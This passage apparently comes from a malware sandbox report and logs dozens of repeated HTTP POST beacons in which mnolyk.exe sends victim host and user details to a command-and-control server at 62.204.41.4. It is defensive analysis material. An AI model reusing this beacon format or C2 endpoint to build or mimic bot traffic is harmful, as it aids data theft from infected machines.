                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.287807941 CET | 605 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      16 | 192.168.2.7 | 49740 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:01.508138895 CET | 448 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.572156906 CET | 448 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      160 | 192.168.2.7 | 49886 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:39.465156078 CET | 606 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.527257919 CET | 606 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      161 | 192.168.2.7 | 49887 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:39.694820881 CET | 607 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.759475946 CET | 607 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      162 | 192.168.2.7 | 49888 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:39.931255102 CET | 608 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:39.997347116 CET | 608 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      163 | 192.168.2.7 | 49889 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:40.164302111 CET | 609 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.229357958 CET | 609 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      164 | 192.168.2.7 | 49890 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:40.402321100 CET | 610 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.467500925 CET | 610 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      165 | 192.168.2.7 | 49891 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:40.650923967 CET | 611 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.715030909 CET | 611 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      166 | 192.168.2.7 | 49892 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:40.888978958 CET | 612 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:40.951904058 CET | 612 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      167 | 192.168.2.7 | 49893 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:41.133872032 CET | 613 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.200634956 CET | 613 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      168 | 192.168.2.7 | 49894 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:41.381592989 CET | 614 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.445008993 CET | 614 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      169 | 192.168.2.7 | 49895 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:41.619812965 CET | 615 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.683928013 CET | 615 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      17 | 192.168.2.7 | 49741 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:01.744620085 CET | 449 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:01.808621883 CET | 449 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      170 | 192.168.2.7 | 49896 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:41.854218006 CET | 616 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:41.918668985 CET | 616 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      171 | 192.168.2.7 | 49897 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:42.089660883 CET | 617 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.155524969 CET | 617 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      172 | 192.168.2.7 | 49898 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:42.338053942 CET | 618 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.403964043 CET | 618 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      173 | 192.168.2.7 | 49899 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:42.575366020 CET | 619 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.640623093 CET | 619 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      174 | 192.168.2.7 | 49900 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:42.821924925 CET | 620 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:42.888844013 CET | 620 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      175 | 192.168.2.7 | 49901 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:43.063640118 CET | 621 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:43.127892017 CET | 621 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
